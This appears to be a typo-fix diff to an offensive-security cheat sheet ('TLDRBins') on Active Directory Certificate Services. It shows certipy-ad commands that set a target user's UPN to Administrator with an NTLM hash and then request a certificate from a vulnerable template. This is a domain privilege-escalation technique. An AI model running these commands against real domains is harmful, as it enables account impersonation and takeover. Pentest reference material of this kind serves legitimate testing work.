TLDRBins TLDRBins / ADCS

 # NTLM certipy-ad account update -username '<USER>@<DOMAIN>' -hashes <HASH> -user <TARGET_USER> -upn Administrator

-2. Request a Cert of Targer User
+2. Request a Cert of Target User

 # Password certipy-ad req -username '<TARGET_USER>@<DOMAIN>' -password '<PASSWORD>' -ca <CA> -template <VULN_TEMPLATE>